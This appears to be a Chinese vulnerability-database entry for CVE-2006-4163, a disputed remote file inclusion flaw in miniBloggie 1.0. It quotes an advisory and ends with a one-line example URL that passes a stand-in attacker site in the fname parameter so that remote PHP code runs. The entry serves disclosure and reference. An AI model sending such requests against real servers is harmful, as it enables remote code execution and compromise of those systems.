MyWebland miniBloggie 'cls_fast_template.php' Fname远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110791 漏洞类型 输入验证
发布时间 2006-08-10 更新时间 2006-09-28
CVE编号 CVE-2006-4163 CNNVD-ID CNNVD-200608-269
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28378
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-269
|漏洞详情
**有争议**myWeblandminiBloggie1.0及早期版本的cls_fast_template.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助fname参数中的URL执行任意PHP代码。注:另一研究人员在借助URL包含文件后,无法执行代码。截至2006年8月16日CVE分析还没有得出最终结果。
|漏洞EXP
source: http://www.securityfocus.com/bid/19476/info

miniBloggie is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

Version 1.0 is reported vulnerable; other versions may also be affected.

http://www.example.com/[miniBloggie]/cls_fast_template.php?fname=attacker's site
|参考资料

来源:BID
名称:19476
链接:http://www.securityfocus.com/bid/19476
来源:BUGTRAQ
名称:20060810miniBloggie<=1.0(fname)RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/442966/100/0/threaded
来源:BUGTRAQ
名称:20060813Re:miniBloggie<=1.0(fname)RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/443160/100/0/threaded